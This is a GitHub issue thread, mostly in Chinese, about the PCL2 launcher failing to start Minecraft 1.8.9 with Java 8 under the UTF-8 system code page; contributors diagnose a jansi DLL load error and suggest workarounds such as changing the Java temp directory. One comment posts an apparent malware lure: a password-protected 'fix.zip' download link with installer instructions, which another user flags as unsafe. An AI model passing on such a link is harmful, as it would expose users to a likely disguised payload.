### ISSUE TITLE
特定编码、Java 下无法启动游戏

### ISSUE THREAD

**Issue by Ext1nguisher** [Hex-Dragon/PCL2#4627]
### 检查项

- [X] **我所启动的游戏不是整合包，且未安装任何 Mod。** 安装 Mod 后的游戏崩溃基本不是 PCL 的原因，请 **不要** 提交反馈。你可以在论坛或社区找人求助，但这里并不是你求助的地方。
- [X] **我已尝试使用 HMCL 启动，HMCL 没有出现问题。** 如果 HMCL 也无法启动就不是 PCL 导致的问题，请 **不要** 提交反馈。[下载 HMCL](https://hmcl.huangyuhui.net/download)
- [X] 我已在 [Issues 页面](https://github.com/Hex-Dragon/PCL2/issues?q=is%3Aissue+) 和 [常见&难检反馈及问题列表](https://github.com/Hex-Dragon/PCL2/discussions/1930) 中搜索，确认了这一 Bug 未被提交过。

### 描述

pcl自动下载的java8启动1.8.9版本出现错误
我先下载了1.8.9版本，提示是否需要自动安装java8，选择是。
选择之后pcl显示下载java，约10秒后进度条走完，并没有出现窗口，minecraft崩溃。
崩溃窗口只显示“minecraft出现问题”，没有更详细的信息。
但是使用自己下载的java启动没有问题。

### PCL 错误报告、日志与附件

[错误报告-2024-8-29_12.54.14.zip](https://github.com/user-attachments/files/16792233/-2024-8-29_12.54.14.zip)

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lactobionicAcid** [comment]
**请勿**点进上一条回复的链接！
@LTCatt @Light-Beacon

**Comment by wuliaodexiaoluo** [comment]
>Caused by: java.lang.UnsatisfiedLinkError: Could not load library. Reasons: [no jansi in java.library.path, C:\Users\小锟斤拷同学\AppData\Local\Temp\jansi-64-3854093697855057671.dll: Can't find dependent libraries]

网络问题导致的 Java 不完整，如果可能，请自备 Java
#3496

**Comment by Ext1nguisher** [comment]
> > Caused by: java.lang.UnsatisfiedLinkError: Could not load library. Reasons: [no jansi in java.library.path, C:\Users\小锟斤拷同学\AppData\Local\Temp\jansi-64-3854093697855057671.dll: Can't find dependent libraries]
> 
> 网络问题导致的 Java 不完整，如果可能，请自备 Java #3496

但是我重新下载了很多次，并且手动下载的也不行了

**Comment by wuliaodexiaoluo** [comment]
>但是我重新下载了很多次，并且手动下载的也不行了

请尝试新建一个不包含中文用户名的账户然后再次尝试启动，另外如果开启了 Beta：使用 UTF-8 提供全球解码支持，请关掉这个选项

**Comment by hejiehao** [comment]
在 `控制面板` -- `时钟和区域` -- `区域` -- `管理` -- `更改系统区域设置` 里面上面选`中文（简体，中国）`，并且把下面那个勾去掉 ![Image](https://img.kookapp.cn/assets/2023-03/zsLRF3LrcD0we0hj.png)

**Comment by LTCatt** [comment]
使用了 UTF8Encoding+UTF8EncodingSealed (65001) 代码页，很罕见。
报错是 jlw 的……
@00ll00 看看？

**Comment by Ext1nguisher** [comment]
对，这个utf-8是我开的，因为有个程序包依赖它才能工作。。。
除了把这个选项关掉还有别的选择吗?.......
影响这么严重吗？我还以为只有乱码问题呢

**Comment by hejiehao** [comment]
Use Java 21

**Comment by wuliaodexiaoluo** [comment]
>对，这个utf-8是我开的，因为有个程序包依赖它才能工作。。。
除了把这个选项关掉还有别的选择吗?.......
影响这么严重吗？我还以为只有乱码问题呢

这会导致使用 GBK 936 代码页的应用程序全部炸掉
如果不带 Mod 且版本支持的话可以用 Java 19+ 启动，这个问题是在 Java 19 被修复的

**Comment by JingHai-Lingyun** [comment]
总感觉是 #4485 的副作用…… 那个 PR 把部分活动代码页改成了 65001（执行 `chcp` 命令）

**Comment by Ext1nguisher** [comment]
> 这会导致使用 GBK 936 代码页解析中文字符的应用程序全部炸掉，因为 UTF-8 和 GBK 的编码并不一致 如果不带 Mod 且版本支持的话可以用 Java 19+ 启动，这个问题是在 Java 19 被修复的 当然最好是关掉

1.8.9应该只能使用java8的吧，还是19+也行？版本差太大了。
我可以逝世看

**Comment by Ext1nguisher** [comment]
> 这个 dll 没找到可能是路径里的中文字符导致的
但是我是d盘路径：D:\jdk\java8
没中文字符啊也。。。

**Comment by wuliaodexiaoluo** [comment]
>但是我是d盘路径：D:\jdk\java8
没中文字符啊也。。。

是 jlw 的问题，加载目录是中文的，你可以导出并用记事本编辑启动脚本，按下 Ctrl+F 搜索 -Doolloo.jlw.tmpdir=，然后把=号后面的内容改成英文再运行启动试试看看会不会炸
就像这样
![image](https://github.com/user-attachments/assets/19ab2145-d897-4f91-a3ec-42c1572c0bdb)

**Comment by Ext1nguisher** [comment]
> > 但是我是d盘路径：D:\jdk\java8
> > 没中文字符啊也。。。
> 
> 是 jlw 的问题，加载目录是中文的，你可以导出并用记事本编辑启动脚本，按下 Ctrl+F 搜索 -Doolloo.jlw.tmpdir=，然后把=号后面的内容改成英文再运行启动试试看看会不会炸 就像这样 ![image](https://private-user-images.githubusercontent.com/160083863/363040455-19ab2145-d897-4f91-a3ec-42c1572c0bdb.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ5OTI0NDAsIm5iZiI6MTcyNDk5MjE0MCwicGF0aCI6Ii8xNjAwODM4NjMvMzYzMDQwNDU1LTE5YWIyMTQ1LWQ4OTctNGY5MS1hM2VjLTQyYzE1NzJjMGJkYi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODMwJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgzMFQwNDI5MDBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lZmFmNGQzZDM4Y2RmMTYzZmYzNDUzZjgwYzkxODEzYWI1YmRjODI5ODE0OTI0M2JhOWNlZDdjNTc0MmQ4NzFhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.vb61F-al9pTUOw19Bs6cgOkgDf8ZWsrZrcCTUPCCL_8)

等号后面的东西本来就是英文的。。。。

**Comment by 00ll00** [comment]
> > 这个 dll 没找到可能是路径里的中文字符导致的
> 
> 但是我是d盘路径：D:\jdk\java8 没中文字符啊也。。。

是我没说明白 x]

我是指`C:\Users\小锟斤拷同学\AppData\Local\Temp\`这个路径，这个是系统默认的临时文件路径，也是 java 默认使用的临时文件路径。从报错来看是在把 dll 文件释放到这里然后加载的过程中找不到这个文件，有可能是没释放出来，或者是释放了找不到。使用`-Djava.io.tmpdir=xxx`这个 jvm 参数可以重新指定 java 使用的临时文件目录。

**Comment by Ext1nguisher** [comment]
> > > 这个 dll 没找到可能是路径里的中文字符导致的
> > 
> > 
> > 但是我是d盘路径：D:\jdk\java8 没中文字符啊也。。。
> 
> 是我没说明白 x]
> 
> 我是指`C:\Users\小锟斤拷同学\AppData\Local\Temp\`这个路径，这个是系统默认的临时文件路径，也是 java 默认使用的临时文件路径。从报错来看是在把 dll 文件释放到这里然后加载的过程中找不到这个文件，有可能是没释放出来，或者是释放了找不到。使用`-Djava.io.tmpdir=xxx`这个 jvm 参数可以重新指定 java 使用的临时文件目录。

好，明白了。
谢谢大佬.

**Comment by Ext1nguisher** [comment]
@LTCatt 目前什么情况?
我测试了发现LatestLaunch文件中并没有`-Djava.io.tmpdir=xxx`的字段 @00ll00 
![image](https://github.com/user-attachments/assets/8ef00c14-9abb-4014-96be-642ffa9367fe)
启动器内部修复有何进展吗?

**Comment by hejiehao** [comment]
自己加一个 `-Djava.io.tmpdir=`

**Comment by Ext1nguisher** [comment]
> 自己加一个 `-Djava.io.tmpdir=`

好的

**Comment by Ext1nguisher** [comment]
![image](https://github.com/user-attachments/assets/f9d4688c-360e-4738-868e-ef88c4981cbb)

**Comment by Ext1nguisher** [comment]
> ![image](https://private-user-images.githubusercontent.com/162774918/363407481-f9d4688c-360e-4738-868e-ef88c4981cbb.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUxMDExMzAsIm5iZiI6MTcyNTEwMDgzMCwicGF0aCI6Ii8xNjI3NzQ5MTgvMzYzNDA3NDgxLWY5ZDQ2ODhjLTM2MGUtNDczOC04NjhlLWVmODhjNDk4MWNiYi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODMxJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgzMVQxMDQwMzBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03OWQ3MzU1OTc3MjEyZTUxOTkwZTgyZTMwN2NmYjEzZWVhNjVkNzVhMTNhZmRhZWUyZTI3Mjc0MjhjNjFkMWFhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.84IEy83w6lutBnm1tXlMgFy3nFCkRBdrgfqL8tNNt_w)

在我保持原样的情况下就出现错误了
改了之后还是错误
注: 我上一个启动的版本不是1.8.9,而是1.20.1

**Comment by Ext1nguisher** [comment]
在我保持原样的情况下就出现错误了
改了之后还是错误
注: 我上一个启动的版本不是1.8.9,而是1.20.1

**Comment by 00ll00** [comment]
可以尝试在 PCL2 -> 设置 -> 游戏 -> 高级启动选项 -> JVM参数头 的末尾加上`-Djava.io.tmpdir="D:\MineCraft\PlainCraft\PCL"`，注意不要换行，而是使用空格和前面的内容隔开。修改后直接使用PCL启动游戏。

**Comment by Ext1nguisher** [comment]
> 可以尝试在 PCL2 -> 设置 -> 游戏 -> 高级启动选项 -> JVM参数头 的末尾加上`-Djava.io.tmpdir="D:\MineCraft\PlainCraft\PCL"`，注意不要换行，而是使用空格和前面的内容隔开。修改后直接使用PCL启动游戏。

好的

**Comment by allMagicNB** [comment]
……就不能用 HMCL 启动看看？

**Comment by HomoobyDX** [comment]
他已经勾选了用HMCL启动没有问题，证明提交者已经尝试过了，属于PCL这边的问题

**Comment by allMagicNB** [comment]
> 他已经勾选了用HMCL启动没有问题，证明提交者已经尝试过了，属于PCL这边的问题

那是必填项，不填不能开 Issue。而且启动脚本也没有啊？

**Comment by Ext1nguisher** [comment]
我已经验证过了，请 @allMagicNB 不要再说了
~~HMCL启动脚本我懒得导出~~

**Comment by Ext1nguisher** [comment]
> 请导出它。

国庆再说 :P
开学之后没时间

**Comment by LTCatt** [comment]
> 可以尝试在 PCL2 -> 设置 -> 游戏 -> 高级启动选项 -> JVM参数头 的末尾加上`-Djava.io.tmpdir="D:\MineCraft\PlainCraft\PCL"`，注意不要换行，而是使用空格和前面的内容隔开。修改后直接使用PCL启动游戏。

@00ll00 没用，子橙的新电脑遇到这个问题了，加了也打不开

**Comment by LTCatt** [comment]
> > 可以尝试在 PCL2 -> 设置 -> 游戏 -> 高级启动选项 -> JVM参数头 的末尾加上`-Djava.io.tmpdir="D:\MineCraft\PlainCraft\PCL"`，注意不要换行，而是使用空格和前面的内容隔开。修改后直接使用PCL启动游戏。
> 
> 好的

尝试之后有用么？

**Comment by Ext1nguisher** [comment]
有用，已经好了~~sorry刚看到~~

**Comment by LTCatt** [comment]
额，所以是怎么了？

**Comment by Ext1nguisher** [comment]
主要是我现在把那个选项关掉了，我也不想再开开来
人话:我没时间了
有哪位好心人可以帮忙复现然后发错误报告吗?
实在对不起,学业紧张

**Comment by LTCatt** [comment]
由于无法复现暂时关闭

**Comment by Ext1nguisher** [comment]
所以到现在还没人复现
